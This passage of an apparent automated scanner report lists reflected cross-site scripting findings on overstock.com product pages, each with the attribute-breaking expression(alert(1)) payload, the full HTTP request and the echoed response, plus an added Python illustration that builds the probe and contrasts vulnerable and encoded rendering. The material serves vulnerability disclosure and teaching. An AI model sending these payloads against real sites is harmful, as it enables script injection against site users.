The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc162"style%3d"x%3aexpression(alert(1))"b5cde70494e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bc162"style="x:expression(alert(1))"b5cde70494e in the application's response.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload closes the double-quoted attribute with its own quotation mark and adds a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() is specific to Internet Explorer, so this particular PoC may not work in other browsers.

Request

GET /Clothing-Shoes/Tommy-Hilfiger-Womens-Down-Filled-Jacket/5230221/product.html?bc162"style%3d"x%3aexpression(alert(1))"b5cde70494e=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:54:51 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:54:51 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289408091403:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:54:51 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=5230221|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:54:51 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 108513

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j20.overstock.com ssl:false -->


<head>

<title>To
...[SNIP]...
<input type="hidden" name="bc162"style="x:expression(alert(1))"b5cde70494e" value="1"/>
...[SNIP]...

2.77. http://www.overstock.com/Clothing-Shoes/Trotta-Pagano-Womens-Lucetta-Italian-Leather-Knee-high-Boots/5108339/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Trotta-Pagano-Womens-Lucetta-Italian-Leather-Knee-high-Boots/5108339/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78e64"style%3d"x%3aexpression(alert(1))"6d0eb2c7d50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 78e64"style="x:expression(alert(1))"6d0eb2c7d50 in the application's response.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload closes the double-quoted attribute with its own quotation mark and adds a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() is specific to Internet Explorer, so this particular PoC may not work in other browsers.
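Every finding in this section (2.68 through 2.77) is the same defect: the name of a query parameter is written into the name="..." attribute of a hidden input without attribute encoding, so a double quote in the parameter name ends the attribute and whatever follows becomes new attributes. The Python below is an added illustration by the editor, not part of the original report and not the tested application's code. It rebuilds the report's probe shape around the markers from finding 2.77, shows a hypothetical vulnerable renderer next to a hardened one (both invented here to stand in for the real server-side template), and confirms the break-out the way a browser tokenizer would, by parsing the fragment and checking whether an attacker-controlled style attribute appears as a separate attribute, rather than only grepping for the echoed string as the report does.

```python
import html
import secrets
from html.parser import HTMLParser
from urllib.parse import quote

# Same probe shape as every finding in this report: a random marker, a double
# quote that closes the attribute, an injected style attribute, a second marker.
def build_probe(prefix=None, suffix=None):
    prefix = prefix or secrets.token_hex(8)[:5]
    suffix = suffix or secrets.token_hex(8)[:11]
    raw = f'{prefix}"style="x:expression(alert(1))"{suffix}'
    return raw, prefix, suffix

# Request line as it appears in the report: the probe is the parameter *name*,
# with = and : percent-encoded and the quotes sent literally.
_SAFE = '"()'
def probe_url(path, raw):
    return f"{path}?{quote(raw, safe=_SAFE)}=1"

# Two hypothetical renderers for the sink seen in the responses above
# (<input type="hidden" name="..." value="1"/>). Neither is the tested
# application's real code; they are constructed for this illustration.
def render_hidden_vulnerable(name, value):
    # Parameter name concatenated straight into a quoted attribute.
    return f'<input type="hidden" name="{name}" value="{value}"/>'

def render_hidden_safe(name, value):
    # Attribute-context encoding: " becomes &quot; so the attacker cannot
    # terminate the attribute, while the data still round-trips unchanged.
    return (f'<input type="hidden" name="{html.escape(name, quote=True)}" '
            f'value="{html.escape(value, quote=True)}"/>')

class _InputAttrs(HTMLParser):
    """Record the attribute list of every <input> tag as a tokenizer sees it."""
    def __init__(self):
        super().__init__()
        self.inputs = []

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.inputs.append(dict(attrs))

def injected_attributes(fragment, prefix):
    """Attributes of the <input> whose name starts with our first marker.
    If the break-out worked, 'style' shows up as a separate attribute."""
    parser = _InputAttrs()
    parser.feed(fragment)
    parser.close()
    for attrs in parser.inputs:
        if (attrs.get("name") or "").startswith(prefix):
            return attrs
    return {}

def echoed_verbatim(fragment, raw):
    """The report's own criterion: payload reflected without encoding."""
    return raw in fragment

def is_attribute_xss(fragment, prefix):
    """True when the parser sees an attacker-controlled style attribute
    carrying the expression() PoC, i.e. the injection is live."""
    attrs = injected_attributes(fragment, prefix)
    return "expression(" in (attrs.get("style") or "")

if __name__ == "__main__":
    # Markers taken from finding 2.77 so the output matches the report.
    raw, prefix, _ = build_probe("78e64", "6d0eb2c7d50")
    path = ("/Clothing-Shoes/Trotta-Pagano-Womens-Lucetta-Italian-Leather-"
            "Knee-high-Boots/5108339/product.html")
    print(probe_url(path, raw))
    for label, render in (("vulnerable", render_hidden_vulnerable),
                          ("hardened", render_hidden_safe)):
        page = render(raw, "1")
        print(label, page)
        print("  echoed verbatim:   ", echoed_verbatim(page, raw))
        print("  attribute break-out:", is_attribute_xss(page, prefix))
```

The hardened renderer is the whole fix: encode every reflected value for the context it lands in, and treat parameter names as untrusted input exactly like parameter values. The expression() payload only fires in Internet Explorer, but the defect being reported is the quote break-out itself, which this check detects independently of which browser would execute the result.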

Request

GET /Clothing-Shoes/Trotta-Pagano-Womens-Lucetta-Italian-Leather-Knee-high-Boots/5108339/product.html?78e64"style%3d"x%3aexpression(alert(1))"6d0eb2c7d50=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:55:56 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:55:56 GMT
Pragma: no-cache
Set-Cookie: mxcproclicks=5108339|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:56 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408156555:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:56 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=28
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 113511

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j16.overstock.com ssl:false -->


<head>

<title>Tr
...[SNIP]...
<input type="hidden" name="78e64"style="x:expression(alert(1))"6d0eb2c7d50" value="1"/>
...[SNIP]...

2.78. http://www.overstock.com/Clothing-Shoes/U-I-Mens-Solid-Black-Suit/3142267/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/U-I-Mens-Solid-Black-Suit/3142267/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b093d"style%3d"x%3aexpression(alert(1))"48619d077d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b093d"style="x:expression(alert(1))"48619d077d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/U-I-Mens-Solid-Black-Suit/3142267/product.html?b093d"style%3d"x%3aexpression(alert(1))"48619d077d1=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 15:58:37 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 15:58:37 GMT
Pragma: no-cache
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:58:37 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3142267|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:58:37 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404717788:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 116933

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j14.overstock.com ssl:false -->


<head>

<title>U&
...[SNIP]...
<input type="hidden" name="b093d"style="x:expression(alert(1))"48619d077d1" value="1"/>
...[SNIP]...

2.79. http://www.overstock.com/Clothing-Shoes/Urban-Eyes-Aviator-Womens-Sunglasses/4878052/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Urban-Eyes-Aviator-Womens-Sunglasses/4878052/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9552e"style%3d"x%3aexpression(alert(1))"a9a967e2da5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9552e"style="x:expression(alert(1))"a9a967e2da5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Urban-Eyes-Aviator-Womens-Sunglasses/4878052/product.html?9552e"style%3d"x%3aexpression(alert(1))"a9a967e2da5=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:57:00 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:57:00 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408220458:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:57:00 GMT; Path=/
Set-Cookie: mxcproclicks=4878052|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:57:00 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=16
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 110410

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j13.overstock.com ssl:false -->


<head>

<title>Ur
...[SNIP]...
<input type="hidden" name="9552e"style="x:expression(alert(1))"a9a967e2da5" value="1"/>
...[SNIP]...

2.80. http://www.overstock.com/Clothing-Shoes/Wayfarer-Mens-Plastic-Sunglasses/4081944/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Wayfarer-Mens-Plastic-Sunglasses/4081944/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7a7e"style%3d"x%3aexpression(alert(1))"95e7139af68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f7a7e"style="x:expression(alert(1))"95e7139af68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Wayfarer-Mens-Plastic-Sunglasses/4081944/product.html?f7a7e"style%3d"x%3aexpression(alert(1))"95e7139af68=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:56:43 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:56:43 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289408203348:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:43 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4081944|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:43 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=27
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 110724

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j20.overstock.com ssl:false -->


<head>

<title>Wa
...[SNIP]...
<input type="hidden" name="f7a7e"style="x:expression(alert(1))"95e7139af68" value="1"/>
...[SNIP]...

2.81. http://www.overstock.com/Crafts-Sewing/Brother-CE5000-Project-Runway-Sewing-Machine-Refurbished/4254548/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Crafts-Sewing/Brother-CE5000-Project-Runway-Sewing-Machine-Refurbished/4254548/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9e70"style%3d"x%3aexpression(alert(1))"e7ffcc6a332 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e9e70"style="x:expression(alert(1))"e7ffcc6a332 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Crafts-Sewing/Brother-CE5000-Project-Runway-Sewing-Machine-Refurbished/4254548/product.html?e9e70"style%3d"x%3aexpression(alert(1))"e7ffcc6a332=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:06:01 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:06:01 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289405161531:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4254548|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:06:01 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:06:01 GMT; Path=/
Keep-Alive: timeout=5, max=69
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 112484

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>Br
...[SNIP]...
<input type="hidden" name="e9e70"style="x:expression(alert(1))"e7ffcc6a332" value="1"/>
...[SNIP]...

2.82. http://www.overstock.com/Crafts-Sewing/Brother-CE5500PRW-50-stitch-Project-Runway-Sewing-Machine-Refurbished/5146644/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Crafts-Sewing/Brother-CE5500PRW-50-stitch-Project-Runway-Sewing-Machine-Refurbished/5146644/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a7c0"style%3d"x%3aexpression(alert(1))"55a54c4c9d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6a7c0"style="x:expression(alert(1))"55a54c4c9d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Crafts-Sewing/Brother-CE5500PRW-50-stitch-Project-Runway-Sewing-Machine-Refurbished/5146644/product.html?6a7c0"style%3d"x%3aexpression(alert(1))"55a54c4c9d8=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:07:53 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:07:53 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289405273805:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
